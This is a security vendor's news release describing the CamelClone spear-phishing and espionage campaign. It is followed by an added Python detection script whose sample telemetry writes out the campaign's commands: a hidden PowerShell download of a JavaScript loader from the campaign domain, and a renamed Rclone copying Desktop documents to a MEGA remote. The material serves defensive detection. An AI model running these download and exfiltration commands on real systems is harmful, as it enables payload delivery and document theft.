Seqrite Unmasks CamelClone APT Espionage Campaign Targeting Four Nations

Seqrite Labs, the enterprise security research division of Quick Heal Technologies and India’s premier malware analysis facility, has unmasked Operation CamelClone—a meticulously orchestrated cyber espionage campaign targeting government agencies, defence establishments, diplomatic entities, and strategic energy organisations across Algeria, Mongolia, Ukraine, and Kuwait. The operation employs highly targeted spear-phishing emails masquerading as legitimate military correspondence to deliver a sophisticated infection chain that silently exfiltrates sensitive procurement documents, policy drafts, and Telegram session credentials to attacker-controlled MEGA cloud storage, operating with surgical precision and near-perfect stealth.

The campaign unfolds through ZIP archives bearing convincing lures like “Weapons Requirements for Kuwait Air Force” or “Algerian-Ukrainian Proposals for Cooperation.” Victims who open the embedded Windows shortcuts (.lnk files) unwittingly trigger PowerShell commands that download HOPPINGANT, a JavaScript loader, from the innocuous-sounding filebulldogs[.]com. This payload deploys Rclone (a legitimate file synchronisation tool, renamed l.exe), configured to harvest .doc, .pdf and .txt files from users’ Desktops and upload them to anonymous MEGA accounts; the same XOR encryption and the same credentials are used across all regions.

Precision Espionage Bypassing Conventional Defences

What distinguishes CamelClone is its masterful use of living-off-the-land binaries (LOLBins), leveraging trusted Windows utilities like PowerShell and Rclone to evade signature-based antivirus solutions. The malware maintains persistence through Telegram credential theft, granting attackers ongoing diplomatic channel access. Identical TTPs—single XOR key, uniform Rclone configs, shared C2 infrastructure—confirm a single threat actor orchestrating multi-national operations.

Seqrite researchers traced the campaign through telemetry from its 8-million-endpoint network, which recorded 265.52 million detections between October 2024 and September 2025 (an average of 505 per minute). The India Cyber Threat Report 2026 positions CamelClone within surging APT activity blending espionage, hacktivism, and extortion.

National Security and DPDP Compliance Implications

For Indian enterprises mirroring these profiles—defence contractors, PSUs, diplomatic missions—the breach calculus extends beyond data loss. Exfiltration triggers Digital Personal Data Protection Act 2023 obligations: mandatory breach notification within 72 hours, accountability demonstrations, and potential ₹250 crore penalties for safeguard failures.

Seqrite CISO Vipul Saini warned: “CamelClone exemplifies state-aligned threats demanding behavioural detection beyond signatures. Cognitive intrusions assume breach inevitability—organisations must hunt proactively.”

Comprehensive Defensive Blueprint

Immediate hardening mandates PowerShell Module/Script Block Logging, Rclone application whitelisting, MEGA domain egress blocking, and Telegram enterprise MFA. Seqrite XDR delivers unified visibility for lateral movement hunting across endpoints, networks and cloud.

Regular phishing simulations, removable media controls, and zero-trust segmentation form layered defence. Enterprises should audit for similar TTPs immediately, prioritising C-suite and procurement systems.
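As an added illustration of the audit step above (example code, not part of Seqrite’s report), the following Python triages constructed Sysmon-style process-creation records for the stages the article describes: explorer.exe spawning a downloading PowerShell, a JavaScript loader, and a renamed Rclone copying Desktop documents to a MEGA remote. Field names follow Sysmon Event ID 1; the wscript.exe launcher for the loader, and all paths, GUIDs, file names and remote names, are assumptions.

```python
"""Triage constructed Sysmon-style process-creation events (Event ID 1 fields) for the
CamelClone chain: explorer.exe -> PowerShell downloader -> JavaScript loader -> renamed
Rclone (l.exe) copying Desktop documents to MEGA. All events below are constructed samples."""
import re
from pathlib import PureWindowsPath

DOWNLOADER = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer|\bcurl\b", re.I)
RCLONE_VERB = re.compile(r"\b(copy|sync|move|copyto)\b", re.I)
USER_JS = re.compile(r'\\(AppData|Temp|Downloads)\\[^"]*\.js\b', re.I)

def triage_event(ev):
    """Return detection tags for one event; an empty list means nothing matched."""
    image = PureWindowsPath(ev["Image"]).name.lower()
    parent = PureWindowsPath(ev.get("ParentImage", "")).name.lower()
    cmd, original = ev.get("CommandLine", ""), ev.get("OriginalFileName", "").lower()
    tags = []
    # Stage 1: a .lnk double-click appears as explorer.exe spawning PowerShell that downloads something.
    if image in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" and DOWNLOADER.search(cmd):
        tags.append("lnk_powershell_download")
    # Stage 2 (assumed launcher): Windows Script Host running a .js file from a user-writable path.
    if image in ("wscript.exe", "cscript.exe") and USER_JS.search(cmd):
        tags.append("script_host_js_loader")
    # Stage 3: the PE's OriginalFileName says rclone.exe but the file on disk is called something else.
    if original == "rclone.exe" and image != "rclone.exe":
        tags.append("renamed_rclone")
    # Stage 3, exfil: an Rclone transfer verb aimed at a mega: remote or reading the Desktop.
    is_rclone = original == "rclone.exe" or image == "rclone.exe"
    if is_rclone and RCLONE_VERB.search(cmd) and re.search(r"\bmega:|\\Desktop\b", cmd, re.I):
        tags.append("rclone_mega_desktop_exfil")
    return tags

def triage(events):
    """Map ProcessGuid -> tags for every event that tripped at least one rule."""
    return {ev["ProcessGuid"]: tags for ev in events if (tags := triage_event(ev))}

# Constructed sample telemetry: GUIDs, user names, file names and the remote name are made up.
SAMPLE_EVENTS = [
    {"ProcessGuid": "p1", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "OriginalFileName": "PowerShell.EXE",
     "CommandLine": 'powershell -w hidden -c "iwr https://filebulldogs[.]com/h.js -OutFile $env:TEMP\\h.js"'},
    {"ProcessGuid": "p2", "Image": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "wscript.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'wscript.exe "C:\Users\v\AppData\Local\Temp\h.js"'},
    {"ProcessGuid": "p3", "Image": r"C:\Users\v\AppData\Local\Temp\l.exe", "OriginalFileName": "rclone.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'l.exe copy "C:\Users\v\Desktop" mega:docs --include "*.doc" --include "*.pdf" --include "*.txt"'},
    {"ProcessGuid": "p4", "Image": r"C:\Program Files\rclone\rclone.exe", "OriginalFileName": "rclone.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": r"rclone.exe sync D:\backups s3:corp-backups"},
]
```

The benign p4 record (a correctly named Rclone syncing to a non-MEGA remote) produces no tag, which is the distinction a whitelisting rule needs to preserve.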

Seqrite’s public disclosure empowers global preemption against this persistent adversary.
